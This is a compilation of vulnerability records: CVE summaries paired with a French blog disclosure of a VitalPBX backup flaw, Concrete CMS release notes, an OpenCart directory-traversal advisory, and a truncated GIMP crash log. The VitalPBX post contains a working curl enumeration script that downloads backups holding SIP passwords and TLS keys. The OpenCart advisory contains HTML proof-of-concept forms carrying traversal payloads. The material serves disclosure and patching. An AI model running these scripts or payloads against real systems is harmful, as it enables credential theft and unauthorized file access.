IBM Cognos Analytics 11.1.7, 11.2.0, and 11.2.1 could allow a low level user to obtain sensitive information from the details of the 'Cloud Storage' page for which they should not have access. IBM X-Force ID: 202682.

CVE-2021-29768: Security Bulletin: IBM Cognos Analytics has addressed multiple vulnerabilities

Missing access control in the backup system of Telesoft VitalPBX before 3.2.1 allows attackers to access the PJSIP and SIP extension credentials, cryptographic keys and voicemails files via unspecified vectors.

Alors que nous jouions avec configurions notre VitalPBX tranquillement, nous avons découvert une vulnérabilité relativement facile à mettre en œuvre et donnant accès à des données qu’on ne devrait pas pouvoir lire librement (_i.e._ les mot de passe des extensions, mais pas que). Voici comment elle fonctionne... et pourquoi vous devriez mettre votre version à jours.

Inutile pour une famille, donc indispensable pour une famille geek, nous avons un IPBX à la maison. Parmi les nombreux logiciels sur le marché, nous avons installé un VitalPBX dans une machine virtuelle connectée au reste de notre réseau et qui fait le lien entre nos téléphones IP (des IP-8815) et nos lignes externes analogiques (via une passerelle HX4G connectée aux boxes des FAI).

Au fil de nos aventures dans ce monde merveilleux de la VoIP, nous avons expérimenté plein d’astuces qui nous permettent d’avoir, @home, toutes les fonctionnalités qu’on attend d’un système téléphonique d’entreprise (ou d’hôtel) : groupe de sonnerie, messagerie vocale et test de turing (pour éviter les robots d’appel)...

© Rodrigo SalomonHC @ pixabay

Dernière en date : la sauvegarde (parce que les sauvegardes, c’est important). C’est vrai que vu notre infrastructure, ce serveur est rapide à installer et les rares données qu’il contient peuvent être perdues, on aurait donc pu faire l’impasse. Le truc, c’est qu’en tant qu’experts judiciaire, on ne se voit pas intervenir pour des juges et des entreprises sans savoir de quoi on parle (et aussi parce qu’au fond, configurer des serveurs, on aime ça).

Et c’est justement en cherchant à configurer le système de sauvegarde, ou plutôt à l’automatiser, que nous avons découvert cette vulnérabilité...

Les fichiers de sauvegardes étaient accessibles via l’interface web sans aucune restriction et donnent accès, en clair, aux mots de passe aux clés cryptographiques et aux boites vocales (entre autre). Heureusement, c’est corrigé depuis le 4 mai (version 3.2.1) donc mettez votre système à jours.

**La sauvegarde chez VitalPBX**

La configuration des sauvegardes de VitalPBX se fait via l’interface d’administration web. Une fois connecté, vous devez vous rendre dans « admin / Tools / Backup & Restore ». Le formulaire présenté par défaut permet de créer un nouveau profil de sauvegarde, avec au minimum, un nom.

Créer un profil de sauvegarde

Une fois vos profils de sauvegarde créés, vous pouvez les lister via l’icone de menu () puis y accéder en cliquant sur leur nom. Le nouvel écran reprend le formulaire de configuration et ajoute la liste des sauvegardes déjà effectuée (dans la limite configurée plus haut), vous permet d’en restauter une (bouton  à droite dans la ligne correspondante) et de créer de nouveaux points de sauvegarde (bouton  en bas à gauche de l’écran).

Détail d’un profil de sauvegarde

Si vous voulez faire des sauvegardes automatiquement, il faut d’abord ajouter un profile de tâche automatique (via le menu « PBX / Tools / cron profiles ») car tant qu’il n’y en a pas, le champ _Run automatically_ ne poropose que la valeure disabled).

**Vulnérabilités des fichiers de sauvegardes**

Comme vous l’aviez peut être vu, l’interface web propose aussi un bouton  pour télécharger un point de sauvegarde. En cliquant dessus, vous obtiendrez alors une archive au format tar que vous pourriez sauvegarder de votre côté. Ce n’est pas évident parce qu’il nous cache les détails (il est opaque) mais ce bouton ne fait que rediriger votre navigateur vers l’adresse du fichier qui pourrait ressembler à ce qui suit :

    https://monipbx.monreseau.lan/static/backup/c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

Ça n’a l’air de rien vu comme ça mais en vérifiant les détails, vous allez voir que ça va poser problème.

**Téléchargement sans contrôle d’accès**

La configuration du serveur web se trouve, comme toujours sur les _Red Hat_, dans /etc/httpd/conf.d/ et plus particulièrement, le fichier vitalpbx.conf. On y trouve la configuration des vhosts (serveurs web virtuels) utilisés par vitalpbx, dont celui de l’interface d’administration web qui nous intéresse et dont voici un extrait :

    <VirtualHost *:443>
            ...
            <Directory "/var/lib/vitalpbx/static">
                    Require all granted
            </Directory>
            Alias /static "/var/lib/vitalpbx/static"
            ...
    </VirtualHost>

Si on le lit du bas en haut, on apprend que le préfixe /static dans l’adresse est en fait un alias qui correspond au répertoire /var/lib/vitalpbx/static. Puis (ou plutôt _avant_) que ce répertoire est en libre accès (Require all granted). Aucun code PHP, aucune ligne de configuration ou fichier .htaccess ne viendra tempérer cette absence de contrôle d’accès.

Si on connait l’adresse d’un fichier, on peut y accéder sans contrainte.

Seule consolation, le serveur ne permet pas de lister les fichiers dans un répertoire ; si vous accédez à https://monipbx.monreseau.lan/static/backup/, le système vous retournera une erreur _403 - Forbidden_ (vous n’avez pas le droit de voir le contenu du répertoire).

**Adresse déterministe**

Il faut donc deviner le reste de l’adresse des fichiers de sauvegarde...

    c4ca4238a0b923820dcc509a6f75849b/vitalpbx-1650260415.tar

*   **c4ca4238a0b923820dcc509a6f75849b**, est facile à trouver, il suffirait de la coller dans n’importe quel moteur de recherche pour découvrir qu’il s’agit du MD5 de la chaîne « 1 » (l’identifiant du profil de sauvegarde). En faisant le test avec de nouveaux profiles on obtiens, à chaque fois, le MD5 de leur identifiant, c81e728d9d4c2f636f067f89cc14862c pour 2, puis eccbc87e4b5ce2fe28308fd9f2a7baf3 pour 3, et ainsi de suite.
    
*   **1650260415** est plus subtile (les moteurs de recherche ne vous aideront pas) mais ce n’est que le timestamp du fichier ; soit le nombre de secondes écoulées depuis le 1^er^ janvier 1970 lorsque le fichier a été écrit sur le disque...
    

Tout ce qu’il faut, c’est trouver un identifiant de profil et un timestamp valide, deux informations dont les valeurs suivent des suites toutes simples.

On peut énumérer les profiles (nombres entiers consécutifs) et les timestamps (à rebours à partir de _maintenant_) jusqu’à trouver un fichier de sauvegarde.

**L’exploitation**

Plutôt que tester ces possibilités à la main, on peut automatiser tout ça. Voici une solution en bash 😉. Pour faire court, on teste tous les timestamps sur les dernières 24 heures, pour les 10 premiers profiles. Et on quitte le script dès que curl a trouvé quelque chose.

    #!/bin/bash
    
    now=$(date +%s)
    past=$(date -d "1 day ago" +%s)
    
    for profile in $(seq 1 10) ; do
        md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
    
        curl -sk "https://localhost/static/backup/$md5/" -o /dev/null -w "%{http_code}" | grep -q "404" && continue
    
        for timestamp in $(seq $now -1 $past) ; do
            curl -fJOsk "https://monipbx.monreseau.lan/static/backup/$md5/vitalpbx-$timestamp.tar" && exit 1
        done
    done

Si vous êtes pressé, on peut accélérer tout ça avec un peu de parallélisme sur les appels à curl. Pour ça, on va modifier la boucle intérieure et directement passer le résultat de seq à xargs.

        export md5=$(echo -n $profile | md5sum | sed -e "s/ .*//")
        ...
        seq $now -1 $past | xargs -P 10 -I % bash -c \
            'curl -fJOsk "https://localhost/static/backup/$md5/vitalpbx-%.tar" && exit 255' \
            || exit 1

**Impact**

Le fichier de sauvegarde est une archive tar contenant d’autres archives (gz et tar.gz). Et parmi tout ce qui est sauvegardé, quelques éléments sont particulièrement intéressant...

*   **asterisk.sql.gz** contient, entre autre, la configuration de certaines extensions PJSIP et leurs identifiants (logins et mots de passe en clair),
*   **dialplan.tar.gz** contient, entre autre, la configuration des extensions SIP (dans sip__50-1-extensions.conf) et PJSIP (dans pjsip__50-1-extensions.conf), dont les identifiants (logins et mots de passe en clair),
*   **certificates.tar.gz** contient les certificats TLS ainsi que leur clé privée correspondante,
*   **voicemail.tar.gz**, comme son nom l’indique, contient les boites vocales, c’est à dire les messages audio que les correspondants ont laissé.

Donc, si quelqu’un a la main sur votre fichier de sauvegarde, il peut :

*   **Usurper les extensions** auprès du serveur de VoIP, et lire les messages vocaux laissés par les correspondants,
*   **Usurper le serveur** de configuration (_e.g._ avec un proxy HTTPS) et ensuite récupérer les mots de passe des administrateurs.

Et une fois qu'on a le mot de passe de l'administrateur, on peut tout faire.

**Correction**

_Telesoft S.A_ a corrigé cette vulnérabilité dans la version 3.2.1, une fois mis à jours, votre serveur n’est donc plus vulnérable à cette attaque 🎉.

Dans le détail, les fichiers de sauvegardes ne sont plus accessible directement (ils sont déplacés dans /var/lib/vitalpbx/backup, en dehors des répertoires accessibles par apache) et nécessitent donc passer par l’interface utilisateur en PHP qui fait les vérifications d’authentification.

Pour savoir si votre installation a été victime de cette attaque, vous pouvez regarder les journaux du serveur web. Ils se trouvent dans /var/log/httpd, une recherche sur /static/backup vous dira si des accès ont eu lieu. Si vous constatez des accès, et si vous voulez rester prudent, changez vos clés TLS et les mots de passe (extensions et pour être prudent, utilisateurs).

**Historique de publication**

*   **Découverte de la vulnérabilité :** 1er avril 2022,
*   **Communication à l’éditeur :** 1er avril 2022,
*   **Correctif de sécurité :** 4 mai 2022 (version 3.2.1 R1).

CVE-2022-29330: CVE-2022-29330 - Vulnérabilité dans VitalPBX < 3.2.1

XSS in /dashboard/blocks/stacks/view_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are outputted can be exploited for Concrete 8.5.7 and below as well as Concrete 9.0 through 9.0.2 to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 3.1with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting

**New Features**

*   Improved appearance and functionality when editing block, area, layout and container styles inline in the page (thanks deek87)
*   Added the ability for an Express attribute to be marked as unique, provided its attribute type supports it. Unique attributes will be useful for SKUs, enforcing email uniqueness, etc…
*   Much improved version comparison feature that can compare the HTML of two page versions and highlight differences (thanks deek87 and hissy)
*   Feature Link block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Hero Image block improvements: Adds option for 'link' styled button using BS5 .btn-link button class, Adds the option to include an icon in the button and to have icon only buttons. Moves some construction of the button to the view file to allow easy comprehension/modification/extension in Block Templates by novice developers (thanks Katalysis)
*   Added new Security Policy page in the Dashboard (thanks hissy)
*   Added a “Revert to Draft” command button on published pages in the Composer interface (thanks hissy)
*   Improvements and refinements to Dashboard file details screen in desktop and mobile views.
*   Added the ability to move a file folder in the Dashboard file manager.
*   Added the tree view back to the Groups Dashboard page.
*   Add title field for YouTube and Video block types for better accessibility (thanks Mesuva)

**Behavioral Improvements**

*   Express attributes no longer need to be unique across all Express objects. Instead attribute handles can be reused provided they’re not reused within the same object.
*   New Express forms will be created when Express Form blocks that have been copied are edited in their new locations (thanks Xanweb)
*   File chooser has improved view and functionality; bug fixes; adding width, height and size to list and grid view; adding detail image callout on hover.
*   Task Options in the Dashboard have have been moved into a modal dialog when present, so they’re harder to miss (thanks deek87)
*   Express entity attribute handles now can be reused as long as they’re not reused within the same Express object.
*   You can now click on the entire row of a Dashboard results table (like the page search, file manager, etc…) and go to the detail URL.
*   Better display of inline floating commands for things like containers and block move.
*   We now show the container name when hovering over containers in edit mode.
*   Reinstated CSS and JavaScript asset post-processing cache setting; restructured the Dashboard Cache Settings page for better grouping of functionality and explanation.
*   Improve display of Recaptcha settings page.
*   Appearance improvements to Waiting for Me and the Dashboard desktop.
*   Active classes for pages added to the output of the Top Navigation Bar block (thanks danklassen)
*   Locale home page is now undeleteable when using multilingual sites.
*   Miscellaneous performance improvements for logged-in users (thanks hissy)
*   Added rate limiting to Forgot Password using the built-in IP Allowlist/Denylist functionality
*   Better usage of meta canonical tag in page under certain circumstances (thanks hissy)
*   File folders now cannot be deleted if they have sub-folders or sub-files in them.
*   Display improvements to inline style dropdown (no more too-dark panels with no contrast.)
*   Better automatic display of the “Approve Stack” button when editing block parameters, styles and permissions in the stacks Dashboard page.
*   Don’t allow users to delete site types until they have removed all sites of that type.
*   Improvements when Concrete is installed in a subdirectory instead of the root directory of a website.
*   Added the ability to view a user’s public profile from their Dashboard user details page.
*   Added --session-handler to the console install utility. Set to database if you’d like to override the default file-based sessions.
*   Gotten rid of the behavior where certain dynamic trees cause pages to scroll to them on load (visible on Express Object details edit, adding groups, using the Groups selector in custom Dashboard pages, and more)
*   JavaScript and CSS assets now have the timestamp of when the cache was last cleared appended to them (thanks deek87, haeflimi)
*   Added the link back to the “Data Objects” Express management interface from the header of that Express objects results page.
*   Added URL Path as a column that can be added to the Page Search interface.
*   Fixed: Login page forces gray background on custom themes
*   Fixed: Scheduled page publishing doesn't purge the page cache (thanks hissy)
*   Added more caching to certain objects to improve performance (thanks hissy)
*   Pre-selected File Storage Location For Nested Folder

**Bug Fixes**

*   Much improved PHP 8 compatibility fixes for all core block types (thanks deek87)
*   Fixed user permissions for searching users with non super admin not working in sites upgraded from 8.5 until permissions were reset.
*   Fixed inability to assign groups, users, group sets or group combinations to group permissions when updating from 8.5.
*   Improvements to core libraries to allow for installation on PHP 8.1 w/Composer.
*   PHP 8 compatibility fixes for Calendar (thanks deek87)
*   Fixed: Database Character Set is no longer showing current character set.
*   Fixed: Missing font selection for body font in Atomik customizer when using Default skin.
*   Fixed: Batch Task with empty batch does not finish running
*   Fix Top Navigation Bar block 'include sticky nav' setting not set appropriately when editing the block
*   Fixed inability to drag an individual block out of the stacks panel in a page.
*   Fixed: Document Library advanced search fields do not display
*   Fixed “Express form error dirty entity” error that users might see when creating forms on the front-end.
*   Fixed bug where attribute data validation routines weren’t being run when updating certain objects and certain objects in bulk.
*   Fixed: Express Calendar and Calendar Event Attributes Not Correctly Implemented
*   Fixed: "Added to Page" File search filter doesn't work
*   Fixed: Schedule Guest Access doesn't work (thanks HamedDarragi)
*   Fixed: Page Search in chooser dialog doesn’t work (thanks HamedDarragi)
*   Fixed: The multilingual panel/page relations panel didn’t allow you to create pages in the multilingual trees from the related page - and it used to.
*   Fixed strange appearance in Dashboard sitemap selector when using multisite and multiple locales.
*   Fixed bugs with using custom file attributes with the Document Library block.
*   Fixed theme customizer not working on legacy LESS-based themes when being used with a large number of LESS variables.
*   Fixed inability to see sort icons on attributes in the Dashboard.
*   Fix Auto-Nav showing duplicate tabs in themes based on Bootstrap 3 (thanks lvanstrijland)
*   Fixed: When using more than one user search criteria by group, one to include groups and one to exclude groups, we get the wrong results (thanks mnakalay)
*   Fixed: Accordion block doesn't load required assets when not using BS5 based theme.
*   Fixed Error when try to edit 'express details block' (thanks Ruud-Zuiderlicht)
*   Fixed edit page type basic details error on PHP 8.
*   Tooltips now work properly again in Composer interface (thanks danklassen)
*   Fixed inability to create and update skins for themes that had a large number of parameters under certain conditions.
*   Fixed errors that would occur when creating a site, enabling multilingual, setting a new source locale, and deleting the original default locale.
*   Fixed: User activation workflow, Activate action not working
*   Fixed: 9.0.2 Seo Bulk Updater for multilingual site not showing results when selecting All Levels (thanks danklassen)
*   Fixed: Placing a Sticky "Top Navigation Bar" in Global "Navigation" using Atomik blocks editing of page
*   Fixed: Topics Attribute Search Form is not getting translated on Frontend (thanks 1stthomas)
*   Re-enabled the ability to edit a user’s avatar from their Dashboard details page.
*   Fixed: Clipboard - Unable to remove broken clipboard entries/clipboard doesnt remove deleted blocks
*   Fixed: When placing a stack, the edit mode menu is not displayed
*   Fixed: Adding Options To Option List Page Attribute Undefined Array Key under PHP 8
*   Fixed: Multilingual copy site tree with alias pages (thanks hissy)
*   Fixed: v9 Elemental Block Edit Nav Tabs Broken (thanks ccmEnlil)
*   Fixed: Error in updating package from marketplace incorrectly displaying itself under certain conditions (thanks JohnTheFish)
*   Fixed: Accordion block editing interface rich text editor doesn’t have access to Concrete-specific features like file manager, sitemap, etc…
*   Fixes ErrorException - Undefined property: Concrete\\Core\\Permission\\Access\\Entity\\GroupCombinationEntity::$label under PHP 8 (thanks 1stthomas)
*   Legacy form's "reply to this email address" checked state was not properly passed (thanks katzueno)
*   Fixed errors with the legacy form (thanks mlocati)
*   Fixed: Updating an express form handle can result in a table name that is too long for mysql
*   Fix several user search fields not retaining their selected values (thanks mnakalay)
*   Fixed: install with Elemental full fails due to undefined array key "titleFormat" under PHP 8
*   Fix YouTube block responsive size class issue (thanks katalysis)
*   Fixed Marketplace dashboard page broken under PHP 8
*   Conversation rating stars now appear properly (thanks deek87)
*   Fixed inability to remove an entry from the trash when that entry is an alias to an external link (thanks Ruud-Zuiderlicht)
*   Fixed bug where core “Parallax Image” area custom template (deprecated) now works again
*   Fix a bug with having multiple image blocks with on-hover attribute set on the page didn’t work reliably (thanks evgk)
*   Fixed: Toolbar title styling interfering with intelligent search results in accessibility mode (thanks Mesuva)
*   Fixed: Switch Language block default view does not work
*   Fixed inability to use the “Express Entry Selector Multiple” form control type.
*   \[V9 RC\]Fixed cookie not being cleared properly to open "add block panel" when using the sticky add panel and installing Concrete in a sub-directory
*   Fixed: Position of the reCAPTCHA badge not shown correctly after saving
*   Fixed errors in waiting for me when groups or users were deleted.
*   Fix inability to set storage location from file details Dashboard page.
*   Fixed bugs with thumbnails on alternate storage locations (thanks mnakalay)
*   Fixed: concrete.debug.hide\_keys' not working on Globals do to commented Code
*   Fix IpAccessControlService check against specific access control category (thanks mlocati)
*   Access Control: fix sorting categories in the dashboard page (thanks mlocati)
*   Fixed bug: When there's no time window, we currently ban IP addresses forever, even if we configure Concrete to only ban for X seconds. (thanks mlocati)
*   Fixed bug: "Illegal mix of collations" when running reindex task when running under certain database conditions.
*   Added “snippet.png” back into rich text editor so you can see that button.
*   Fixed: Removing Author User From Page Attributes & Saving Throws Error
*   Fixed: Deleting Containers throws Access Denied error under certain in-page editing conditions.
*   Fixed: Rich Text Page Attribute Composer "Source" Editing Hindered By Composer Autosave
*   Fixed a bug in image processing (Imagine Library) that could lead to segmentation faults under certain conditions (thanks mlocati)
*   Fixed: PlaceholderService error in thumbnail overview (thanks haeflimi)
*   Fixed: Deleting Containers shows multiple delete modal windows under certain in-page editing conditions.
*   Fixed: Top navigation block always loads the default site tree even in multilingual sites (thanks danklassen)
*   Fixed inability to override session handler to database in config prior to installation and then install successfully.
*   Fix missing none option in attribute display block (thanks JohnTheFish)
*   Fixed: Stacks with no approved versions do not appear in stacks list

**Backward Compatibility Notes**

*   The Concrete\Core\Express\Form\Validator\Routine\RoutineInterface class and all classes that implement it has changed. The validate method now takes a nullable third parameter for the Concrete\Core\Entity\Express\Entry object that may or may not exist. This replaces the request type attribute. The request type can now be inferred - if the entry does not exist, we assume this to be an ADD operation. If the entry exists within the validate method, you are running an UPDATE operation.
*   Block::duplicate() has changed its secondary parameter from $isCopiedWhenPropagated to $controllerMethodToTryAndRun. This lets us choose duplicate_master or the new duplicate_clipboard in certain situations. It is very unlikely that this should impact any custom code you have written as this is pretty deep in the Concrete internals.
*   If you have customized the Document Library view template, please ensure that your <form> tag has a valid input button with the name ”search”. This is checked in the controller in order to ensure searching is actually occurring. If you want to search by advanced file attributes, you’ll need this to be in place or else the Document Library controller will not check for attribute searching.

**Developer Updates**

*   Added on_page_version_delete event (thanks hathawayweb)
*   Mail Importer code running on ancient Zend Mail code updated to PHP 7+ (thanks KevinBLT)
*   Patches to third party libraries to allow for installation on PHP 8.1 w/Composer (thanks mlocati)
*   htmlawed HTML sanitization library updated for better compatibility with HTML5.
*   IP Access Control: add IpAccessControlCategory::describeTimeWindow() (thanks mlocati)
*   Allow Date service class to work with DateTimeImmutable objects (thanks mlocati)
*   Improvements and bug fixes to route building and controller syntax (thanks mlocati)
*   More reliable running of on\_start() in block controllers before page contents are rendered (thanks hissy)
*   Moved concrete5/dependency-patches to the core composer.json instead of the separate composer project (thanks mlocati)
*   Improved code commenting throughout all core blocks (thanks deek87)
*   Fix list\_syntax rule of PHP-CS-Fixer (thanks mlocati)
*   Significant list of third party PHP script minor updates.
*   Simplify c5:exec return code (thanks mlocati)
*   Fixed: Task scheduling command is incorrect on dashboard page and in documentation, needs more detail
*   Concrete\Core\Http\ResponseFactory used to take $session as its first constructor dependency, even though that was not used. This caused problems in the event response factory was used prior to sessions being available or being configured for database sessions that were not yet installed. This parameter has been removed. If you use the $app->make() method of building this class, you should not be affected.
*   Now using https:// for communication with the Concrete marketplace even when the user’s site is not https://

**Security Fixes**

*   Fixed several places where we weren’t sanitizing file names in the file manager and stacks page.
*   Remediated CVE-2022-21829 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can download zip files over HTTP and execute code from those zip files which could lead to an RCE. Fixed by enforcing ‘concrete\_secure’ instead of ‘concrete’. Concrete now only makes requests over https even if a request comes in via http. Concrete CMS security team ranked this 8 with CVSS v3.1 vector: AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H Credit goes to Anna for reporting on HackerOne - https://hackerone.com/reports/1482520
*   Remediated CVE-2022-30117 - Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below allowed traversal in /index.php/ccm/system/file/upload which could result in an Arbitrary File Delete exploit. This was remediated by sanitizing /index.php/ccm/system/file/upload to ensure Concrete doesn’t allow traversal and by changing isFullChunkFilePresent to have an early false return when input doesn't match expectations.Concrete CMS Security team ranked this 5.8 with CVSS v3.1 vector AV:N/AC:H/PR:H/UI:N/S:C/C:N/I:N/A:H. Credit to Siebene for reporting https://hackerone.com/reports/1482280
*   Remediated CVE-2022-30120 - XSS in /dashboard/blocks/stacks/view\_details/ - old browsers only. When using an older browser with built-in XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Dashboard Stacks page sort URLs are now sanitized. Concrete CMS Security team ranked this vulnerability 3.1 with CVSS v3.1 Vector AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Credit to Bogdan Tiron from FORTBRIDGE (https://www.fortbridge.co.uk/ ) for reporting https://hackerone.com/reports/1363598
*   Remediated CVE-2022-30119 - XSS in /dashboard/reports/logs/view - old browsers only. When using Internet Explorer with the XSS protection disabled, insufficient sanitation where built urls are output can be exploited for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below to allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Sanitation has been added where built urls are output. Thanks zeroinside for reporting https://hackerone.com/reports/1370054
*   Remediated CVE-2022-30118 - XSS in /dashboard/system/express/entities/forms/save\_control/\[GUID\]: \\ old browsers only. When using Internet Explorer with the XSS protection disabled, editing a form control in an express entities form for Concrete CMS Versions 9.0.0 through 9.0.2 as well as 8.5.7 and below can allow XSS. This cannot be exploited in modern-day web browsers due to an automatic input escape mechanism. Concrete CMS Security team ranked this vulnerability 2 with CVSS v3.1 Vector AV:N/AC:H/PR:H/UI:R/S:U/C:N/I:L/A:N. Thanks zeroinside for reporting https://hackerone.com/reports/1370054

CVE-2022-30120: 9.1.0 Release Notes :: Concrete CMS

In OpenCart 1.4.7 to 1.5.5.1, implemented anti-traversal code in filemanager.php is ineffective and can be bypassed.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Janek Vind <come2waraxe () yahoo com>  
_Date_: Tue, 19 Mar 2013 09:21:51 -0700 (PDT)  

\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===============================================================================

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

###############################################################################
1. Directory Traversal Vulnerabilities in "filemanager.php"
###############################################################################

Reason: insufficient sanitization of user-supplied data
Attack vectors:
 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
 1. Logged in as admin with filemanager access privileges
 
Script "filemanager.php" offers for OpenCart admins various file related services:
directory listing and creation, image file listing, file copy/move/unlink, upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:
------------------------\[ source code start \]----------------------------------
public function directory() {    
    $json = array();
    
    if (isset($this->request->post\['directory'\])) {
        $directories = glob(rtrim(DIR\_IMAGE . 'data/' . 
           str\_replace('../', '', $this->request->post\['directory'\]), '/') . 
           '/\*', GLOB\_ONLYDIR); 
        
        if ($directories) {
            $i = 0;
        
            foreach ($directories as $directory) {
                $json\[$i\]\['data'\] = basename($directory);
                $json\[$i\]\['attributes'\]\['directory'\] = 
                   utf8\_substr($directory, strlen(DIR\_IMAGE . 'data/'));
...
    
    $this->response->setOutput(json\_encode($json));
------------------------\[ source code end \]------------------------------------

We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\\" substring for directory traversal.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..\\..\\..\\">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.

Second problem - filtering with "str\_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..././..././..././..././">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is exactly same as in previous test - information about directory
structure outside of OpenCart main directory has been disclosed.

PHP script "filemanager.php" contains 14 uses of "str\_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directories
public function move() -> renaming of files or directories
public function copy() -> copying of files or directories
public function rename() -> renaming of files or directories
public function upload() -> uploading of image or flash files



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- \[ EOF \] ------------------------------------

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

**Current thread:**

*   **\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1** _Janek Vind (Mar 19)_

CVE-2013-1891: Full Disclosure: [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1

An issue in gimp_layer_invalidate_boundary of GNOME GIMP 2.10.30 allows attackers to trigger an unhandled exception via a crafted XCF file, causing a Denial of Service (DoS).

    GNU Image Manipulation Program version 2.10.30
    git-describe: Unknown, shouldn't happen
    Build: org.gimp.GIMP_official rev 0 for windows
    # C compiler #
    	Using built-in specs.
    	COLLECT_GCC=W:\msys64-gtk2\mingw64\bin\gcc.exe
    	COLLECT_LTO_WRAPPER=W:/msys64-gtk2/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/11.2.0/lto-wrapper.exe
    	Target: x86_64-w64-mingw32
    	Configured with: ../gcc-11.2.0/configure --prefix=/mingw64 --with-local-prefix=/mingw64/local --build=x86_64-w64-mingw32 --host=x86_64-w64-mingw32 --target=x86_64-w64-mingw32 --with-native-system-header-dir=/mingw64/x86_64-w64-mingw32/include --libexecdir=/mingw64/lib --enable-bootstrap --enable-checking=release --with-arch=x86-64 --with-tune=generic --enable-languages=c,lto,c++,fortran,ada,objc,obj-c++,jit --enable-shared --enable-static --enable-libatomic --enable-threads=posix --enable-graphite --enable-fully-dynamic-string --enable-libstdcxx-filesystem-ts --enable-libstdcxx-time --disable-libstdcxx-pch --disable-libstdcxx-debug --enable-lto --enable-libgomp --disable-multilib --disable-rpath --disable-win32-registry --disable-nls --disable-werror --disable-symvers --with-libiconv --with-system-zlib --with-gmp=/mingw64 --with-mpfr=/mingw64 --with-mpc=/mingw64 --with-isl=/mingw64 --with-pkgversion='Rev5, Built by MSYS2 project' --with-bugurl=https://github.com/msys2/MINGW-packages/issues --with-gnu-as --with-gnu-ld --with-boot-ldflags='-pipe -Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high -Wl,--disable-dynamicbase -static-libstdc++ -static-libgcc' 'LDFLAGS_FOR_TARGET=-pipe -Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high' --enable-linker-plugin-flags='LDFLAGS=-static-libstdc++\ -static-libgcc\ -pipe\ 